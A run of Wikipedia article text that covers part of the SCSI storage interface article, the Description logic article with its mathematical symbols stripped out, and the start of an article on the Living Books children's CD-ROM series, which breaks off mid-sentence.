SAS (NL-SAS) drives. Instead of SCSI, modern desktop computers and notebooks typically use SATA interfaces for internal hard disk drives, with NVMe over PCIe gaining popularity as SATA can bottleneck modern solid-state drives. Interfaces SCSI is available in a variety of interfaces. The first was parallel SCSI (also called SCSI Parallel Interface or SPI), which uses a parallel bus design. Since 2005, SPI was gradually replaced by Serial Attached SCSI (SAS), which uses a serial design but retains other aspects of the technology. Many other interfaces which do not rely on complete SCSI standards still implement the SCSI command protocol; others drop physical implementation entirely while retaining the SCSI architectural model. iSCSI, for example, uses TCP/IP as a transport mechanism, which is most often transported over Gigabit Ethernet or faster network links. SCSI interfaces have often been included on computers from various manufacturers for use under Microsoft Windows, classic Mac OS, Unix, Commodore Amiga and Linux operating systems, either implemented on the motherboard or by the means of plug-in adaptors. With the advent of SAS and SATA drives, provision for parallel SCSI on motherboards was discontinued. Parallel SCSI Initially, the SCSI Parallel Interface (SPI) was the only interface using the SCSI protocol. Its standardization started as a single-ended 8-bit bus in 1986, transferring up to 5 MB/s, and evolved into a low-voltage differential 16-bit bus capable of up to 320 MB/s. The last SPI-5 standard from 2003 also defined a 640 MB/s speed which failed to be realized. Parallel SCSI specifications include several synchronous transfer modes for the parallel cable, and an asynchronous mode. The asynchronous mode is a classic request/acknowledge protocol, which allows systems with a slow bus or simple systems to also use SCSI devices. Faster synchronous modes are used more frequently. SCSI interfaces Cabling SCSI Parallel Interface Internal parallel SCSI cables are usually ribbons, with two or more 50–, 68–, or 80–pin connectors attached. External cables are typically shielded (but may not be), with 50– or 68–pin connectors at each end, depending upon the specific SCSI bus width supported. The 80–pin Single Connector Attachment (SCA) is typically used for hot-pluggable devices Fibre Channel Fibre Channel can be used to transport SCSI information units, as defined by the Fibre Channel Protocol for SCSI (FCP). These connections are hot-pluggable and are usually implemented with optical fiber. Serial attached SCSI Serial attached SCSI (SAS) uses a modified Serial ATA data and power cable. iSCSI iSCSI (Internet Small Computer System Interface) usually uses Ethernet connectors and cables as its physical transport, but can run over any physical transport capable of transporting IP. SRP The SCSI RDMA Protocol (SRP) is a protocol that specifies how to transport SCSI commands over a reliable RDMA connection. This protocol can run over any RDMA-capable physical transport, e.g. InfiniBand or Ethernet when using RoCE or iWARP. USB Attached SCSI USB Attached SCSI allows SCSI devices to use the Universal Serial Bus. Automation/Drive Interface The Automation/Drive Interface − Transport Protocol (ADT) is used to connect removable media devices, such as tape drives, with the controllers of the libraries (automation devices) in which they are installed. The ADI standard specifies the use of RS-422 for the physical connections. The second-generation ADT-2 standard defines iADT, use of the ADT protocol over IP (Internet Protocol) connections, such as over Ethernet. The Automation/Drive Interface − Commands standards (ADC, ADC-2, and ADC-3) define SCSI commands for these installations. SCSI command protocol In addition to many different hardware implementations, the SCSI standards also include an extensive set of command definitions. The SCSI command architecture was originally defined for parallel SCSI buses but has been carried forward with minimal change for use with iSCSI and serial SCSI. Other technologies which use the SCSI command set include the ATA Packet Interface, USB Mass Storage class and FireWire SBP-2. In SCSI terminology, communication takes place between an initiator and a target. The initiator sends a command to the target, which then responds. SCSI commands are sent in a Command Descriptor Block (CDB). The CDB consists of a one byte operation code followed by five or more bytes containing command-specific parameters. At the end of the command sequence, the target returns a status code byte, such as 00h for success, 02h for an error (called a Check Condition), or 08h for busy. When the target returns a Check Condition in response to a command, the initiator usually then issues a SCSI Request Sense command in order to obtain a key code qualifier (KCQ) from the target. The Check Condition and Request Sense sequence involves a special SCSI protocol called a Contingent Allegiance Condition. There are four categories of SCSI commands: N (non-data), W (writing data from initiator to target), R (reading data), and B (bidirectional). There are about 60 different SCSI commands in total, with the most commonly used being: Test unit ready: Queries device to see if it is ready for data transfers (disk spun up, media loaded, etc.). Inquiry: Returns basic device information. Request sense: Returns any error codes from the previous command that returned an error status. Send diagnostic and Receive diagnostic results: runs a simple self-test, or a specialised test defined in a diagnostic page. Start/Stop unit: Spins disks up and down, or loads/unloads media (CD, tape, etc.). Read capacity: Returns storage capacity. Format unit: Prepares a storage medium for use. In a disk, a low level format will occur. Some tape drives will erase the tape in response to this command. Read: (four variants): Reads data from a device. Write: (four variants): Writes data to a device. Log sense: Returns current information from log pages. Mode sense: Returns current device parameters from mode pages. Mode select: Sets device parameters in a mode page. Each device on the SCSI bus is assigned a unique SCSI identification number or ID. Devices may encompass multiple logical units, which are addressed by logical unit number (LUN). Simple devices have just one LUN, more complex devices may have multiple LUNs. A "direct access" (i.e. disk type) storage device consists of a number of logical blocks, addressed by Logical Block Address (LBA). A typical LBA equates to 512 bytes of storage. The usage of LBAs has evolved over time and so four different command variants are provided for reading and writing data. The Read(6) and Write(6) commands contain a 21-bit LBA address. The Read(10), Read(12), Read Long, Write(10), Write(12), and Write Long commands all contain a 32-bit LBA address plus various other parameter options. The capacity of a "sequential access" (i.e. tape-type) device is not specified because it depends, amongst other things, on the length of the tape, which is not identified in a machine-readable way. Read and write operations on a sequential access device begin at the current tape position, not at a specific LBA. The block size on sequential access devices can either be fixed or variable, depending on the specific device. Tape devices such as half-inch 9-track tape, DDS (4 mm tapes physically similar to DAT), Exabyte, etc., support variable block sizes. Device identification Parallel interface On a parallel SCSI bus, a device (e.g. host adapter, disk drive) is identified by a "SCSI ID", which is a number in the range 0–7 on a narrow bus and in the range 0–15 on a wide bus. On earlier models a physical jumper or switch controls the SCSI ID of the initiator (host adapter). On modern host adapters (since about 1997), doing I/O to the adapter sets the SCSI ID; for example, the adapter often contains a Option ROM (SCSI BIOS) program that runs when the computer boots up and that program has menus that let the operator choose the SCSI ID of the host adapter. Alternatively, the host adapter may come with software that must be installed on the host computer to configure the SCSI ID. The traditional SCSI ID for a host adapter is 7, as that ID has the highest priority during bus arbitration (even on a 16 bit bus). The SCSI ID of a device in a drive enclosure that has a back plane is set either by jumpers or by the slot in the enclosure the device is installed into, depending on the model of the enclosure. In the latter case, each slot on the enclosure's back plane delivers control signals to the drive to select a unique SCSI ID. A SCSI enclosure without a back plane often has a switch for each drive to choose the drive's SCSI ID. The enclosure is packaged with connectors that must be plugged into the drive where the jumpers are typically located; the switch emulates the necessary jumpers. While there is no standard that makes this work, drive designers typically set up their jumper headers in a consistent format that matches the way that these switches implement. Setting the bootable (or first) hard disk to SCSI ID 0 is an accepted IT community recommendation. SCSI ID 2 is usually set aside for the floppy disk drive while SCSI ID 3 is typically for a CD-ROM drive. General Note that a SCSI target device (which can be called a "physical unit") is sometimes divided into smaller "logical units". For example, a high-end disk subsystem may be a single SCSI device but contain dozens of individual disk drives, each of which is a logical unit. Further, a RAID array may be a single SCSI device, but may contain many logical units, each of which is a "virtual" disk—a stripe set or mirror set constructed from portions of real disk drives. The SCSI ID, WWN, etc. in this case identifies the whole subsystem, and a second number, the logical unit number (LUN) identifies a disk device (real or virtual) within the subsystem. It is quite common, though incorrect, to refer to the logical unit itself as a "LUN". Accordingly, the actual LUN may be called a "LUN number" or "LUN id". In modern SCSI transport protocols, there is an automated process for the "discovery" of the IDs. The SSA initiator (normally the host computer through the 'host adaptor') "walk the loop" to determine what devices are connected and then assigns each one a 7-bit "hop-count" value. Fibre Channel – Arbitrated Loop (FC-AL) initiators use the LIP (Loop Initialization Protocol) to interrogate each device port for its WWN (World Wide Name). For iSCSI, because of the unlimited scope of the (IP) network, the process is quite complicated. These discovery processes occur at power-on/initialization time and also if the bus topology changes later, for example if an extra device is added. SCSI has the CTL (Channel, Target or Physical Unit Number, Logical Unit Number) identification mechanism per host bus adapter, or the HCTL (HBA, Channel, PUN, LUN) identification mechanism, one host adapter may have more than one channels. Device Type While all SCSI controllers can work with read/write storage devices, i.e. disk and tape, some will not work with some other device types; older controllers are likely to be more limited, sometimes by their driver software, and more Device Types were added as SCSI evolved. Even CD-ROMs are not handled by all controllers. Device Type is a 5-bit field reported by a SCSI Inquiry Command; defined SCSI Peripheral Device Types include, in addition to many varieties of storage device, printer, scanner, communications device, and a catch-all "processor" type for devices not otherwise listed. SCSI enclosure services In larger SCSI servers, the disk-drive devices are housed in an intelligent enclosure that supports SCSI Enclosure Services (SES). The initiator can communicate with the enclosure using a specialized set of SCSI commands to access power, cooling, and other non-data characteristics. See also Fibre Channel List of device bandwidths Parallel SCSI Serial Attached SCSI Notes References Bibliography External links InterNational Committee for Information Technology Standards: T10 Technical Committee on SCSI Storage Interfaces (SCSI standards committee) Macintosh internals Logical communication interfaces Electrical communication interfaces Computer storage buses
183503
https://en.wikipedia.org/wiki/Description%20logic
Description logic
Description logics (DL) are a family of formal knowledge representation languages. Many DLs are more expressive than propositional logic but less expressive than first-order logic. In contrast to the latter, the core reasoning problems for DLs are (usually) decidable, and efficient decision procedures have been designed and implemented for these problems. There are general, spatial, temporal, spatiotemporal, and fuzzy description logics, and each description logic features a different balance between expressive power and reasoning complexity by supporting different sets of mathematical constructors. DLs are used in artificial intelligence to describe and reason about the relevant concepts of an application domain (known as terminological knowledge). It is of particular importance in providing a logical formalism for ontologies and the Semantic Web: the Web Ontology Language (OWL) and its profiles are based on DLs. The most notable application of DLs and OWL is in biomedical informatics where DL assists in the codification of biomedical knowledge. Introduction A description logic (DL) models concepts, roles and individuals, and their relationships. The fundamental modeling concept of a DL is the axiom—a logical statement relating roles and/or concepts. This is a key difference from the frames paradigm where a frame specification declares and completely defines a class. Nomenclature Terminology compared to FOL and OWL The description logic community uses different terminology than the first-order logic (FOL) community for operationally equivalent notions; some examples are given below. The Web Ontology Language (OWL) uses again a different terminology, also given in the table below. Naming convention There are many varieties of description logics and there is an informal naming convention, roughly describing the operators allowed. The expressivity is encoded in the label for a logic starting with one of the following basic logics: Followed by any of the following extensions: Exceptions Some canonical DLs that do not exactly fit this convention are: Examples As an example, is a centrally important description logic from which comparisons with other varieties can be made. is simply with complement of any concept allowed, not just atomic concepts. is used instead of the equivalent . A further example, the description logic is the logic plus extended cardinality restrictions, and transitive and inverse roles. The naming conventions aren't purely systematic so that the logic might be referred to as and other abbreviations are also made where possible. The Protégé ontology editor supports . Three major biomedical informatics terminology bases, SNOMED CT, GALEN, and GO, are expressible in (with additional role properties). OWL 2 provides the expressiveness of , OWL-DL is based on , and for OWL-Lite it is . History Description logic was given its current name in the 1980s. Previous to this it was called (chronologically): terminological systems, and concept languages. Knowledge representation Frames and semantic networks lack formal (logic-based) semantics. DL was first introduced into knowledge representation (KR) systems to overcome this deficiency. The first DL-based KR system was KL-ONE (by Ronald J. Brachman and Schmolze, 1985). During the '80s other DL-based systems using structural subsumption algorithms were developed including KRYPTON (1983), LOOM (1987), BACK (1988), K-REP (1991) and CLASSIC (1991). This approach featured DL with limited expressiveness but relatively efficient (polynomial time) reasoning. In the early '90s, the introduction of a new tableau based algorithm paradigm allowed efficient reasoning on more expressive DL. DL-based systems using these algorithms — such as KRIS (1991) — show acceptable reasoning performance on typical inference problems even though the worst case complexity is no longer polynomial. From the mid '90s, reasoners were created with good practical performance on very expressive DL with high worst case complexity. Examples from this period include FaCT, RACER (2001), CEL (2005), and KAON 2 (2005). DL reasoners, such as FaCT, FaCT++, RACER, DLP and Pellet, implement the method of analytic tableaux. KAON2 is implemented by algorithms which reduce a SHIQ(D) knowledge base to a disjunctive datalog program. Semantic web The DARPA Agent Markup Language (DAML) and Ontology Inference Layer (OIL) ontology languages for the Semantic Web can be viewed as syntactic variants of DL. In particular, the formal semantics and reasoning in OIL use the DL. The DAML+OIL DL was developed as a submission to—and formed the starting point of—the World Wide Web Consortium (W3C) Web Ontology Working Group. In 2004, the Web Ontology Working Group completed its work by issuing the OWL recommendation. The design of OWL is based on the family of DL with OWL DL and OWL Lite based on and respectively. The W3C OWL Working Group began work in 2007 on a refinement of - and extension to - OWL. In 2009, this was completed by the issuance of the OWL2 recommendation. OWL2 is based on the description logic . Practical experience demonstrated that OWL DL lacked several key features necessary to model complex domains. Modeling In DL, a distinction is drawn between the so-called TBox (terminological box) and the ABox (assertional box). In general, the TBox contains sentences describing concept hierarchies (i.e., relations between concepts) while the ABox contains ground sentences stating where in the hierarchy, individuals belong (i.e., relations between individuals and concepts). For example, the statement: belongs in the TBox, while the statement: belongs in the ABox. Note that the TBox/ABox distinction is not significant, in the same sense that the two "kinds" of sentences are not treated differently in first-order logic (which subsumes most DL). When translated into first-order logic, a subsumption axiom like () is simply a conditional restriction to unary predicates (concepts) with only variables appearing in it. Clearly, a sentence of this form is not privileged or special over sentences in which only constants ("grounded" values) appear like (). So why was the distinction introduced? The primary reason is that the separation can be useful when describing and formulating decision-procedures for various DL. For example, a reasoner might process the TBox and ABox separately, in part because certain key inference problems are tied to one but not the other one ('classification' is related to the TBox, 'instance checking' to the ABox). Another example is that the complexity of the TBox can greatly affect the performance of a given decision-procedure for a certain DL, independently of the ABox. Thus, it is useful to have a way to talk about that specific part of the knowledge base. The secondary reason is that the distinction can make sense from the knowledge base modeler's perspective. It is plausible to distinguish between our conception of terms/concepts in the world (class axioms in the TBox) and particular manifestations of those terms/concepts (instance assertions in the ABox). In the above example: when the hierarchy within a company is the same in every branch but the assignment to employees is different in every department (because there are other people working there), it makes sense to reuse the TBox for different branches that do not use the same ABox. There are two features of description logic that are not shared by most other data description formalisms: DL does not make the unique name assumption (UNA) or the closed-world assumption (CWA). Not having UNA means that two concepts with different names may be allowed by some inference to be shown to be equivalent. Not having CWA, or rather having the open world assumption (OWA) means that lack of knowledge of a fact does not immediately imply knowledge of the negation of a fact. Formal description Like first-order logic (FOL), a syntax defines which collections of symbols are legal expressions in a description logic, and semantics determine meaning. Unlike FOL, a DL may have several well known syntactic variants. Syntax The syntax of a member of the description logic family is characterized by its recursive definition, in which the constructors that can be used to form concept terms are stated. Some constructors are related to logical constructors in first-order logic (FOL) such as intersection or conjunction of concepts, union or disjunction of concepts, negation or complement of concepts, universal restriction and existential restriction. Other constructors have no corresponding construction in FOL including restrictions on roles for example, inverse, transitivity and functionality. Notation Let C and D be concepts, a and b be individuals, and R be a role. If a is R-related to b, then b is called an R-successor of a. The description logic ALC The prototypical DL Attributive Concept Language with Complements () was introduced by Manfred Schmidt-Schauß and Gert Smolka in 1991, and is the basis of many more expressive DLs. The following definitions follow the treatment in Baader et al. Let , and be (respectively) sets of concept names (also known as atomic concepts), role names and individual names (also known as individuals, nominals or objects). Then the ordered triple (, , ) is the signature. Concepts The set of concepts is the smallest set such that: The following are concepts: (top is a concept) (bottom is a concept) Every (all atomic concepts are concepts) If and are concepts and then the following are concepts: (the intersection of two concepts is a concept) (the union of two concepts is a concept) (the complement of a concept is a concept) (the universal restriction of a concept by a role is a concept) (the existential restriction of a concept by a role is a concept) Terminological axioms A general concept inclusion (GCI) has the form where and are concepts. Write when and . A TBox is any finite set of GCIs. Assertional axioms A concept assertion is a statement of the form where and C is a concept. A role assertion is a statement of the form where and R is a role. An ABox is a finite set of assertional axioms. Knowledge base A knowledge base (KB) is an ordered pair for TBox and ABox . Semantics The semantics of description logics are defined by interpreting concepts as sets of individuals and roles as sets of ordered pairs of individuals. Those individuals are typically assumed from a given domain. The semantics of non-atomic concepts and roles is then defined in terms of atomic concepts and roles. This is done by using a recursive definition similar to the syntax. The description logic ALC The following definitions follow the treatment in Baader et al. A terminological interpretation over a signature consists of a non-empty set called the domain a interpretation function that maps: every individual to an element every concept to a subset of every role name to a subset of such that (union means disjunction) (intersection means conjunction) (complement means negation) Define (read in I holds) as follows TBox if and only if if and only if for every ABox if and only if if and only if if and only if for every Knowledge base Let be a knowledge base. if and only if and Inference Decision problems In addition to the ability to describe concepts formally, one also would like to employ the description of a set of concepts to ask questions about the concepts and instances described. The most common decision problems are basic database-query-like questions like instance checking (is a particular instance (member of an ABox) a member of a given concept) and relation checking (does a relation/role hold between two instances, in other words does a have property b), and the more global-database-questions like subsumption (is a concept a subset of another concept), and concept consistency (is there no contradiction among the definitions or chain of definitions). The more operators one includes in a logic and the more complicated the TBox (having cycles, allowing non-atomic concepts to include each other), usually the higher the computational complexity is for each of these problems (see Description Logic Complexity Navigator for examples). Relationship with other logics First-order logic Many DLs are decidable fragments of first-order logic (FOL) and are usually fragments of two-variable logic or guarded logic. In addition, some DLs have features that are not covered in FOL; this includes concrete domains (such as integer or strings, which can be used as ranges for roles such as hasAge or hasName) or an operator on roles for the transitive closure of that role. Fuzzy description logic Fuzzy description logics combines fuzzy logic with DLs. Since many concepts that are needed for intelligent systems lack well defined boundaries, or precisely defined criteria of membership, fuzzy logic is needed to deal with notions of vagueness and imprecision. This offers a motivation for a generalization of description logic towards dealing with imprecise and vague concepts. Modal logic Description logic is related to—but developed independently of—modal logic (ML). Many—but not all—DLs are syntactic variants of ML. In general, an object corresponds to a possible world, a concept corresponds to a modal proposition, and a role-bounded quantifier to a modal operator with that role as its accessibility relation. Operations on roles (such as composition, inversion, etc.) correspond to the modal operations used in dynamic logic. Examples Temporal description logic Temporal description logic represents—and allows reasoning about—time dependent concepts and many different approaches to this problem exist. For example, a description logic might be combined with a modal temporal logic such as linear temporal logic. See also Formal concept analysis Lattice (order) Semantic parameterization Semantic reasoner References Further reading F. Baader, D. Calvanese, D. L. McGuinness, D. Nardi, P. F. Patel-Schneider: The Description Logic Handbook: Theory, Implementation, Applications. Cambridge University Press, Cambridge, UK, 2003. Ian Horrocks, Ulrike Sattler: Ontology Reasoning in the SHOQ(D) Description Logic, in Proceedings of the Seventeenth International Joint Conference on Artificial Intelligence, 2001. D. Fensel, F. van Harmelen, I. Horrocks, D. McGuinness, and P. F. Patel-Schneider: OIL: An Ontology Infrastructure for the Semantic Web. IEEE Intelligent Systems, 16(2):38-45, 2001. Ian Horrocks and Peter F. Patel-Schneider: The Generation of DAML+OIL. In Proceedings of the 2001 Description Logic Workshop (DL 2001), volume 49 of CEUR <http://ceur-ws.org/>, pages 30–35, 2001. Ian Horrocks, Peter F. Patel-Schneider, and Frank van Harmelen: From SHIQ and RDF to OWL: The Making of a Web Ontology Language. Journal of Web Semantics, 1(1):7-26, 2003. Bernardo Cuenca Grau, Ian Horrocks, Boris Motik, Bijan Parsia, Peter Patel-Schneider, and Ulrike Sattler: OWL 2: The next step for OWL. Journal of Web Semantics, 6(4):309-322, November 2008. Franz Baader, Ian Horrocks, and Ulrike Sattler: Chapter 3 Description Logics. In Frank van Harmelen, Vladimir Lifschitz, and Bruce Porter, editors, Handbook of Knowledge Representation. Elsevier, 2007. Alessandro Artale and Enrico Franconi: Temporal Description Logics. In Handbook of Temporal Reasoning in Artificial Intelligence, 2005. Web Ontology (WebONT) Working Group Charter. W3C, 2003 World Wide Web Consortium Issues RDF and OWL Recommendations. Press Release. W3C, 2004. OWL Working Group Charter. W3C, 2007. OWL 2 Connects the Web of Knowledge with the Web of Data. Press Release. W3C, 2009. Markus Krötzsch, František Simančík, Ian Horrocks: A Description Logic Primer. CoRR . 2012. A very first introduction for readers without a formal logic background. Sebastian Rudolph: Foundations of Description Logics. In Reasoning Web: Semantic Technologies for the Web of Data, 7th International Summer School, volume 6848 of Lecture Notes in Computer Science, pages 76–136. Springer, 2011. (springerlink)Introductory text with a focus on modelling and formal semantics. There are also slides. Jens Lehmann: DL-Learner: Learning concepts in description logics, Journal of Machine Learning Research, 2009. Franz Baader: Description Logics. In Reasoning Web: Semantic Technologies for Information Systems, 5th International Summer School, volume 5689 of Lecture Notes in Computer Science, pages 1–39. Springer, 2009. (springerlink) Introductory text with a focus on reasoning and language design, and an extended historical overview. Enrico Franconi: Introduction to Description Logics. Course materials. Faculty of Computer Science, Free University of Bolzano, Italy, 2002. Lecture slides and many literature pointers, somewhat dated. Ian Horrocks: Ontologies and the Semantic Web. Communications of the ACM, 51(12):58-67, December 2008. A general overview of knowledge representation in Semantic Web technologies. External links Description Logic Complexity Navigator, maintained by Evgeny Zolin at the Department of Computer Science List of Reasoners, OWL research at the University of Manchester Reasoners There are some semantic reasoners that deal with OWL and DL. These are some of the most popular: CEL is an open source LISP-based reasoner (Apache 2.0 License). Cerebra Engine was a commercial C++-based reasoner, acquired in 2006 by webMethods. FaCT++ is a free open-source C++-based reasoner. KAON2 is a free (for non-commercial use) Java-based reasoner, offering fast reasoning support for OWL ontologies. MSPASS is a free open-source C reasoner for numerous DL models. Pellet is a dual-licensed (AGPL and proprietary) commercial, Java-based reasoner. RacerPro of Racer Systems was a commercial (free trials and research licenses are available) lisp-based reasoner, today both an open source version of RACER exists from the original developers at Lübeck University using the BSD 3 license, and also a commercialized version, still named RacerPro by Franz Inc. Sim-DL is a free open-source Java-based reasoner for the language ALCHQ. It also provides a similarity measurement functionality between concepts. To access this functionality a Protégé plugin can be used. HermiT is an open-source reasoner based on the "hypertableau" calculus. It is developed by the University of Oxford. Owlready2 is a package for ontology-oriented programming in Python. It can load OWL 2.0 ontologies as Python objects, modify them, save them, and perform reasoning via HermiT (included). Owlready2 allows a transparent access to OWL ontologies (contrary to usual Java-based API). Editors Protégé is a free, open-source ontology editor and a knowledge base framework, which can use DL reasoners offering DIG Interface as a back end for consistency checks. , an OWL browser/editor that takes the standard web browser as the basic UI paradigm. Interfaces , a standardized XML interface to DLs systems developed by the DL Implementation Group (DIG). , a Java interface and implementation for the Web Ontology Language, used to represent Semantic Web ontologies. Knowledge representation languages Non-classical logic Information science Artificial intelligence
3331902
https://en.wikipedia.org/wiki/Living%20Books
Living Books
Living Books is a series of interactive read-along adventures aimed at children aged 3–9. Created by Mark Schlichting, the series was mostly developed by Living Books for CD-ROM and published by Broderbund for Mac OS and Microsoft Windows. Two decades after the original release, the series was re-released by Wanderful Interactive Storybook for iOS and Android. The series began in 1992 as a Broderbund division that started with an adaptation of Mercer Mayer's Just Grandma and Me. In 1994, the Living Books division was spun-off into its own children's multimedia company, jointly owned by Broderbund and Random House. The company continued to publish titles based on popular franchises such as Arthur, Dr. Seuss, and Berenstain Bears. The next few years saw a saturated market begin to squeeze Living Books company's profits; in 1997 Broderbund agreed to purchase Random House's 50% stake in Living Books and proceeded to dissolve the company. Broderbund was acquired by The Learning Company (formerly SoftKey), Mattel Interactive, and The Gores Group over the following years, and the series was eventually passed to Houghton Mifflin Harcourt, which currently holds the rights. The series was kept dormant for many years until former developers of the series acquired the licence to publish updated and enhanced versions of the titles under the Wanderful Interactive Storybook series in 2010. The series has received acclaim and numerous awards. History Conception Inspiration and pitch The initial motivation behind the series came from a childhood fantasy of Mark Schlichting's to enter into the picture book world of Dr. Seuss's Horton Hears a Who!; to visit the houses of Whoville and interact with the "weird and fantastical instruments and contraptions". As a boy he was enamoured by the fantasy worlds of children's picture books through Dr. Seuss and the magic of animation through Disney. Further inspiration came out of his concern as a father to video gaming boys. By 1986 Schlichting had "Nintendo guilt", observing how his sons were engaged with Nintendo titles for hours, working cooperatively and diligently, but unable to focus on their homework. Their focus was on level mastery, but they couldn't find any titles both educational and fun enough to hold their interest. Schlichting wanted this same level of cognitive involvement with something more substantive, matching the attention-grabbing play aspects of popular games with meaningful content. He devised a concept of "highly interactive animated picture books for children" that would "delight and engage kids but that also had real learning content as well", which would evolve into Living Books. After receiving a degree in fine arts and working as a book publishing art director, he retrained in traditional animation. Schlichting entered the children's software industry in 1987, and was contracted as a freelance animator and digital illustrator at Broderbund Software for early floppy disk PC games including games within the Carmen Sandiego franchise such as Europe and U.S.A. By 1988, Schlichting's work at Broderbund led to him securing a full-time position at the company. Schlichting later admitted that he accepted the job offer to be able to sell his concept to Broderbund, believing that the best way to talk Broderbund into spending $1,000,000 on a product for a market that didn't exist was from within the company. After three months, Broderbund permitted him to create a small prototype in-house, and as source material he used a book he had illustrated called I'm Mine. The "deceptively simple" premise saw Schlichting take the children's story, computerize the artwork, and offer kids the choice of having the computer read the story to them or "play" inside the pages of the book. The title 'Living Books' was chosen to represent that everything in the environment is alive and for the player to experiment with. The then-unknown designer began pitching the CD-ROM-based Living Books around the company "to anyone who would listen" and presented his prototype to demonstrate the concept. Schlichting argued that the "driving force" to make these storybooks interactive was due to the "natural draw and deep interest" that children experience with technological interaction like games; he therefore wanted to offer the ability to "explore and learn through discovery at their own pace". He pitched, "I wanted to harness some of that natural draw that computers have for kids...You know how flowers follow the sun? That's called heliotropism. Well, kids have a 'computertropism'". He "lobbied his bosses" to allow him start a CD-ROM division that would "add a new dimension to children's books", pitching to increasingly senior staff from his superior Michele Bushneff, to her boss Vice President of Broderbund John Baker, and eventually reaching Broderbund co-founder and CEO Doug Carlston, all of whom offered encouragement in different ways. Baker felt that the idea of talking computer books was "obvious and simple" and that it was difficult to imagine them holding the interest of a child; he also thought that animated parents could create the same amount of "involvement and character identification" as an onscreen book through their real-life storytelling. However, he conceded that the medium offered an opportunity to "charm" the user through its design. Approval and prototypes In 1989 Dutch electronics hardware manufacturer Phillips happened to observe the Living Books prototype while on a tour of the Broderbund offices, and offered the company $500,000 to produce a title that would run on a new television set-top box they were in the process of developing. As a result, after four months of pitching Schlichting was given the go-ahead by Carlston to put together a prototype using an early version of what became MacroMedia Director. Carlston was drawn to the idea because he had noticed a demographic trend of births among Broderbund staff jumping to 15 a year, suggesting a "demand for software to help small children learn". Living Books married this demographic trend to new CD-ROM technology that Schlichting was interested in. Baker was put in charge of Living Books. According to St Louis Post-Dispatch, Schlichting "persuaded his employer" to "spend millions of dollars on his notion to create Living Books". As a result, Schlichting's demo concept became a development group. By 1990, the Broderbund's Living Books group had less than 5 people. After a few months of development, the first fully-featured prototype for Living Books was complete; it was an adaption of Mercer Mayer's Little Monsters at School. This beta version included two pages to demonstrate how a transition might work, had the main character narrate the story, and included highlighted text as he read. Schlichting and his son provided the voices for the baby and the young protagonist respectively. The product was designed as a "reading product" as well as a storybook; Schlichting wanted children to have a "relationship with the text". He turned off the mouse cursor until the story was read so they had to watch the words. Schlichting utilised a "child-informed design approach", playtesting the game for children and listening to their feedback, thereby allowing children to "contribute to and critique product development" He wanted the programs to not only be made "for kids" but "with kids". The offices were filled with toys and none of the staff wore ties. The original concept saw a child narrator deliver the story from a prosthenian arch with the text above their head, but upon play-testing Schlichting discovered that children's eyes were fixated on the narrator's mouth and they weren't following the words, which led to a less-in-more design decision. To resolve this, he had the highlighted text as the only animation with nothing else moving, so users focused on the words while the story was being read, followed by the animated action. Schlicting took teacher's comments seriously and "incorporated their suggestions into the designs". Feedback offered by teachers included a request to make to program simple and straightforward to use so they wouldn't have to become technology experts. The prototype was ultimately successful, though the developers also noted the delayed reactions once hotspots were clicked which affected the game's interactivity. Michael Coffey was brought in as their first programmer to help the team work out the technology required to implement their ideas. Meanwhile, Broderbund publicly announced the Living Books project of CD-ROM animated, talking children's stories in August 1991. Mercer Meyer's popular children's book Just Grandma and Me was chosen as the premiere title of the new series, as their initial attempt at "eras[ing] the line between learning and playing". This was because he owned the book rights outright which made negotiation easier; Meyer opted not to collaborate directly with Living Books on the adaption, though he did offer approvals during development. With the support of Broderbund management, the team evolved into the Living Books Broderbund division; they moved to an open office area and added more staff who were allocated to the project. Schlichting originally served as Living Books''' creative director, and in 1996 he would be promoted to VP of research and design. Schlichting commented, "it became clear that I was not selling a product idea, but creating a shared vision about how we could make a difference, and that shared vision influenced how the entire company felt about our work together for years to come". Development (1990–1992) Creative arts Though storyboards and layouts were often sketched out on paper, most of the animation was developed straight into the software instead of being scanned first. All the creative assets were developed on the Mac, as Living Books believed their media tools were the most advanced. The team used Photoshop for basic painting and Illustrator for work that required scaling as it moves; meanwhile the animation was completed in Adobe Director, and followed by being converted to a special format using Broderbund's proprietary rendering/interaction engine. Technical designer Barbara Lawrence worked on digital backgrounds, while ex-Disney animator Don Albretch assisting with animations. Animators like Donna Bonifield worked in the attic with rows of CRT screen computers in a room that reached 120 degrees. Schlichting opted for an animation style instead of using live video clips. As Broderbund didn't have a recording studio, Sound designer Tom Rettig individually recorded and saved each audio file in a small office. Living Books' first full time sound designer and musician, Joey Edleman, wrote the Living Books theme and dances themes for their earlier stories. Edelman had previously worked at Computers and Music, a pioneering audio software company that would be used to develop the sound of Living Books; software companies Digidesign or Opcode asked Edleman what sounds they wanted for his projects to be released in upcoming versions of their programs. Roy Blumenfeld served as audio engineer for The Cat in the Hat. When Schlichting created a sound effect for a falling leaf, he named it "Ode to Goofy" in honour of the Disney character. Schlichting sought colleagues to serve as voice actors, and this process helped the office to become invested and champion the project. Often, ancillary characters were played by Living Books staff; Grandma in Just Grandma and Me was played by Schlichting himself and his son played Little Creature; meanwhile sound designers Bob Marshall and Edelman played Tortoise and Hare in The Tortoise and the Hare. One scene containing in motion cabbages required the entire staff to go into the sound studio and run around. It took up to 15 takes to record words and sentences correctly; they had been recorded carefully in order to get speech right. The sound designers found it difficult to achieve exact sync when sound, CD-ROM, and animation play at varying speeds on different CPU machines. The animation also had to be carefully tuned in order to match the speed limitations of low end machines. Issues could arise with assets like a Bus coming onto the screen with a large part missing off screen. The team noted any times that child playtesters started clicking before the end of a gag, as this was a sign it wasn't working. In some cases, sound is emphasized to compensate for the limits in animation. Graphic technician Rob Bell served as a bridge between the animators and programmers, editing the artists' work to fit into the program and advocating for program edits to fit the artist's vision. Karl Ackerman worked for Living Books as a prototyper, doing concept and programming work on games. Proposed product ideas that were ultimately unsuccessful included adaptions of Between the Lions, Eager Ogre's Pet Show, Nickelodeon's Rugrats, Sesame Street, and Sing Along: Maggie's Farm, among others, as well as a Story Book Maker title in 1996. A group of Broderbund producers – Clair Curtain, Todd Power, and Rob Martyn – was brought in to help Living Books stay on budget and schedule. Around this time, Mickey Mantle was hired as Broderbund CTO and he became an advocate for his "pet project" Living Books, working closely with the programmers to ensure the work was delivered. Lucinda Ray joined Brøderbund from 1993 to 1999 as Education Product Manager, where she managed the development and editing of more than 60 Teacher's Guides to accompany Brøderbund and Living Books' Living Books School Editions. From 1990, Donna Bonifield began in production roles and over four years became Living Books' Technical Creative Director in 1994. Living Books was considered as a skunkworks project by its team, which they believed was hidden from the main building to shield it. At one point Baker who by this point had championed the series, tried to raise money from potential investors at Sony to be able to continue the fledgling project. Edelman jokingly referred to the working conditions as a 